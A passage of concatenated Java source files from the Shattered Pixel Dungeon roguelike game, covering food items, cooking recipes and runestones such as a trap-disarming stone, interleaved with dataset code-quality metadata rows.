public boolean testIngredients(ArrayList<Item> ingredients) {
boolean pasty = false;
boolean ration = false;
boolean meat = false;
for (Item ingredient : ingredients){
if (ingredient.quantity() > 0) {
if (ingredient instanceof Pasty) {
pasty = true;
} else if (ingredient.getClass() == Food.class) {
ration = true;
} else if (ingredient instanceof MysteryMeat
|| ingredient instanceof StewedMeat
|| ingredient instanceof ChargrilledMeat
|| ingredient instanceof FrozenCarpaccio) {
meat = true;
}
}
}
return pasty && ration && meat;
}
@Override
public int cost(ArrayList<Item> ingredients) {
return 6;
}
@Override
public Item brew(ArrayList<Item> ingredients) {
if (!testIngredients(ingredients)) return null;
for (Item ingredient : ingredients){
ingredient.quantity(ingredient.quantity() - 1);
}
return sampleOutput(null);
}
@Override
public Item sampleOutput(ArrayList<Item> ingredients) {
return new MeatPie();
}
}
}
| 2,757 | MeatPie | java | en | java | code | {"qsc_code_num_words": 317, "qsc_code_num_chars": 2757.0, "qsc_code_mean_word_length": 6.27129338, "qsc_code_frac_words_unique": 0.4511041, "qsc_code_frac_chars_top_2grams": 0.06841046, "qsc_code_frac_chars_top_3grams": 0.15291751, "qsc_code_frac_chars_top_4grams": 0.13279678, "qsc_code_frac_chars_dupe_5grams": 0.14939638, "qsc_code_frac_chars_dupe_6grams": 0.111167, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01030928, "qsc_code_frac_chars_whitespace": 0.19078709, "qsc_code_size_file_byte": 2757.0, "qsc_code_num_lines": 98.0, "qsc_code_num_chars_line_max": 92.0, "qsc_code_num_chars_line_mean": 28.13265306, "qsc_code_frac_chars_alphabet": 0.88077095, "qsc_code_frac_chars_comments": 0.28291621, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.12903226, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.11290323, "qsc_codejava_score_lines_no_logic": 0.25806452, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/food/SmallRation.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.food;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Hunger;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class SmallRation extends Food {
{
image = ItemSpriteSheet.OVERPRICED;
energy = Hunger.HUNGRY/2f;
}
@Override
public int price() {
return 10 * quantity;
}
}
| 1,165 | SmallRation | java | en | java | code | {"qsc_code_num_words": 159, "qsc_code_num_chars": 1165.0, "qsc_code_mean_word_length": 5.52201258, "qsc_code_frac_words_unique": 0.65408805, "qsc_code_frac_chars_top_2grams": 0.03758542, "qsc_code_frac_chars_top_3grams": 0.04441913, "qsc_code_frac_chars_top_4grams": 0.06492027, "qsc_code_frac_chars_dupe_5grams": 0.09339408, "qsc_code_frac_chars_dupe_6grams": 0.06378132, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02079002, "qsc_code_frac_chars_whitespace": 0.17424893, "qsc_code_size_file_byte": 1165.0, "qsc_code_num_lines": 37.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 31.48648649, "qsc_code_frac_chars_alphabet": 0.89189189, "qsc_code_frac_chars_comments": 0.67038627, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.07692308, "qsc_codejava_score_lines_no_logic": 0.30769231, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/food/MysteryMeat.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.food;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Burning;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Hunger;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Paralysis;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Poison;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Roots;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Slow;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.utils.GLog;
import com.watabou.utils.Random;
public class MysteryMeat extends Food {
{
image = ItemSpriteSheet.MEAT;
energy = Hunger.HUNGRY/2f;
}
@Override
protected void satisfy(Hero hero) {
super.satisfy(hero);
effect(hero);
}
public int price() {
return 5 * quantity;
}
public static void effect(Hero hero){
switch (Random.Int( 5 )) {
case 0:
GLog.w( Messages.get(MysteryMeat.class, "hot") );
Buff.affect( hero, Burning.class ).reignite( hero );
break;
case 1:
GLog.w( Messages.get(MysteryMeat.class, "legs") );
Buff.prolong( hero, Roots.class, Paralysis.DURATION );
break;
case 2:
GLog.w( Messages.get(MysteryMeat.class, "not_well") );
Buff.affect( hero, Poison.class ).set( hero.HT / 5 );
break;
case 3:
GLog.w( Messages.get(MysteryMeat.class, "stuffed") );
Buff.prolong( hero, Slow.class, Slow.DURATION );
break;
}
}
public static class PlaceHolder extends MysteryMeat {
{
image = ItemSpriteSheet.FOOD_HOLDER;
}
@Override
public boolean isSimilar(Item item) {
return item instanceof MysteryMeat || item instanceof StewedMeat
|| item instanceof ChargrilledMeat || item instanceof FrozenCarpaccio;
}
@Override
public String info() {
return "";
}
}
}
| 2,926 | MysteryMeat | java | en | java | code | {"qsc_code_num_words": 356, "qsc_code_num_chars": 2926.0, "qsc_code_mean_word_length": 6.13483146, "qsc_code_frac_words_unique": 0.4241573, "qsc_code_frac_chars_top_2grams": 0.10119048, "qsc_code_frac_chars_top_3grams": 0.22619048, "qsc_code_frac_chars_top_4grams": 0.24175824, "qsc_code_frac_chars_dupe_5grams": 0.29532967, "qsc_code_frac_chars_dupe_6grams": 0.26053114, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01012966, "qsc_code_frac_chars_whitespace": 0.15652768, "qsc_code_size_file_byte": 2926.0, "qsc_code_num_lines": 92.0, "qsc_code_num_chars_line_max": 76.0, "qsc_code_num_chars_line_mean": 31.80434783, "qsc_code_frac_chars_alphabet": 0.87479741, "qsc_code_frac_chars_comments": 0.26691729, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.11290323, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.01025641, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.08064516, "qsc_codejava_score_lines_no_logic": 0.32258065, "qsc_codejava_frac_words_no_modifier": 0.83333333, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/food/StewedMeat.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.food;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Hunger;
import com.shatteredpixel.shatteredpixeldungeon.items.Recipe;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class StewedMeat extends Food {
{
image = ItemSpriteSheet.STEWED;
energy = Hunger.HUNGRY/2f;
}
@Override
public int price() {
return 8 * quantity;
}
public static class oneMeat extends Recipe.SimpleRecipe{
{
inputs = new Class[]{MysteryMeat.class};
inQuantity = new int[]{1};
cost = 2;
output = StewedMeat.class;
outQuantity = 1;
}
}
public static class twoMeat extends Recipe.SimpleRecipe{
{
inputs = new Class[]{MysteryMeat.class};
inQuantity = new int[]{2};
cost = 3;
output = StewedMeat.class;
outQuantity = 2;
}
}
//red meat
//blue meat
public static class threeMeat extends Recipe.SimpleRecipe{
{
inputs = new Class[]{MysteryMeat.class};
inQuantity = new int[]{3};
cost = 4;
output = StewedMeat.class;
outQuantity = 3;
}
}
}
| 1,903 | StewedMeat | java | en | java | code | {"qsc_code_num_words": 238, "qsc_code_num_chars": 1903.0, "qsc_code_mean_word_length": 5.65546218, "qsc_code_frac_words_unique": 0.51680672, "qsc_code_frac_chars_top_2grams": 0.05052006, "qsc_code_frac_chars_top_3grams": 0.11292719, "qsc_code_frac_chars_top_4grams": 0.0423477, "qsc_code_frac_chars_dupe_5grams": 0.2191679, "qsc_code_frac_chars_dupe_6grams": 0.19985141, "qsc_code_frac_chars_dupe_7grams": 0.15824666, "qsc_code_frac_chars_dupe_8grams": 0.15824666, "qsc_code_frac_chars_dupe_9grams": 0.15824666, "qsc_code_frac_chars_dupe_10grams": 0.15824666, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01849406, "qsc_code_frac_chars_whitespace": 0.20441408, "qsc_code_size_file_byte": 1903.0, "qsc_code_num_lines": 79.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 24.08860759, "qsc_code_frac_chars_alphabet": 0.87054161, "qsc_code_frac_chars_comments": 0.42091435, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.14634146, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.02439024, "qsc_codejava_score_lines_no_logic": 0.12195122, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/stones/InventoryStone.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.stones;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Invisibility;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.windows.WndBag;
import com.watabou.noosa.audio.Sample;
import java.util.ArrayList;
public abstract class InventoryStone extends Runestone {
protected String inventoryTitle = Messages.get(this, "inv_title");
protected WndBag.Mode mode = WndBag.Mode.ALL;
{
defaultAction = AC_USE;
}
public static final String AC_USE = "USE";
@Override
public ArrayList<String> actions(Hero hero) {
ArrayList<String> actions = super.actions( hero );
actions.add( AC_USE );
return actions;
}
@Override
public void execute(Hero hero, String action) {
super.execute(hero, action);
if (action.equals(AC_USE)){
curItem = detach( hero.belongings.backpack );
activate(curUser.pos);
}
}
@Override
protected void activate(int cell) {
GameScene.selectItem( itemSelector, mode, inventoryTitle );
}
protected void useAnimation() {
curUser.spend( 1f );
curUser.busy();
curUser.sprite.operate(curUser.pos);
Sample.INSTANCE.play( Assets.SND_READ );
Invisibility.dispel();
}
protected abstract void onItemSelected( Item item );
protected static WndBag.Listener itemSelector = new WndBag.Listener() {
@Override
public void onSelect( Item item ) {
//FIXME this safety check shouldn't be necessary
//it would be better to eliminate the curItem static variable.
if (!(curItem instanceof InventoryStone)){
return;
}
if (item != null) {
((InventoryStone)curItem).onItemSelected( item );
} else{
curItem.collect( curUser.belongings.backpack );
}
}
};
}
| 2,829 | InventoryStone | java | en | java | code | {"qsc_code_num_words": 343, "qsc_code_num_chars": 2829.0, "qsc_code_mean_word_length": 6.10787172, "qsc_code_frac_words_unique": 0.49854227, "qsc_code_frac_chars_top_2grams": 0.06491647, "qsc_code_frac_chars_top_3grams": 0.1451074, "qsc_code_frac_chars_top_4grams": 0.14701671, "qsc_code_frac_chars_dupe_5grams": 0.08687351, "qsc_code_frac_chars_dupe_6grams": 0.02673031, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00762389, "qsc_code_frac_chars_whitespace": 0.16542948, "qsc_code_size_file_byte": 2829.0, "qsc_code_num_lines": 98.0, "qsc_code_num_chars_line_max": 75.0, "qsc_code_num_chars_line_mean": 28.86734694, "qsc_code_frac_chars_alphabet": 0.87971199, "qsc_code_frac_chars_comments": 0.31495228, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.07017544, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00619195, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.01020408, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.07017544, "qsc_codejava_score_lines_no_logic": 0.28070175, "qsc_codejava_frac_words_no_modifier": 0.8, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 1, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/stones/StoneOfDisarming.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.stones;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.effects.CellEmitter;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.Trap;
import com.shatteredpixel.shatteredpixeldungeon.mechanics.ShadowCaster;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.Point;
import com.watabou.utils.Random;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
public class StoneOfDisarming extends Runestone {
private static final int DIST = 8;
{
image = ItemSpriteSheet.STONE_DISARM;
}
@Override
protected void activate(final int cell) {
boolean[] FOV = new boolean[Dungeon.level.length()];
Point c = Dungeon.level.cellToPoint(cell);
ShadowCaster.castShadow(c.x, c.y, FOV, Dungeon.level.losBlocking, DIST);
int sX = Math.max(0, c.x - DIST);
int eX = Math.min(Dungeon.level.width()-1, c.x + DIST);
int sY = Math.max(0, c.y - DIST);
int eY = Math.min(Dungeon.level.height()-1, c.y + DIST);
ArrayList<Trap> disarmCandidates = new ArrayList<>();
for (int y = sY; y <= eY; y++){
int curr = y*Dungeon.level.width() + sX;
for ( int x = sX; x <= eX; x++){
if (FOV[curr]){
Trap t = Dungeon.level.traps.get(curr);
if (t != null && t.active){
disarmCandidates.add(t);
}
}
curr++;
}
}
Collections.sort(disarmCandidates, new Comparator<Trap>() {
@Override
public int compare(Trap o1, Trap o2) {
float diff = Dungeon.level.trueDistance(cell, o1.pos) - Dungeon.level.trueDistance(cell, o2.pos);
if (diff < 0){
return -1;
} else if (diff == 0){
return Random.Int(2) == 0 ? -1 : 1;
} else {
return 1;
}
}
});
//disarms at most nine traps
while (disarmCandidates.size() > 9){
disarmCandidates.remove(9);
}
for ( Trap t : disarmCandidates){
t.reveal();
t.disarm();
CellEmitter.get(t.pos).burst(Speck.factory(Speck.STEAM), 6);
}
Sample.INSTANCE.play( Assets.SND_TELEPORT );
}
}
| 3,084 | StoneOfDisarming | java | en | java | code | {"qsc_code_num_words": 408, "qsc_code_num_chars": 3084.0, "qsc_code_mean_word_length": 5.27205882, "qsc_code_frac_words_unique": 0.44362745, "qsc_code_frac_chars_top_2grams": 0.041841, "qsc_code_frac_chars_top_3grams": 0.14132961, "qsc_code_frac_chars_top_4grams": 0.14318921, "qsc_code_frac_chars_dupe_5grams": 0.08554161, "qsc_code_frac_chars_dupe_6grams": 0.0260344, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0146942, "qsc_code_frac_chars_whitespace": 0.18352789, "qsc_code_size_file_byte": 3084.0, "qsc_code_num_lines": 104.0, "qsc_code_num_chars_line_max": 102.0, "qsc_code_num_chars_line_mean": 29.65384615, "qsc_code_frac_chars_alphabet": 0.8395552, "qsc_code_frac_chars_comments": 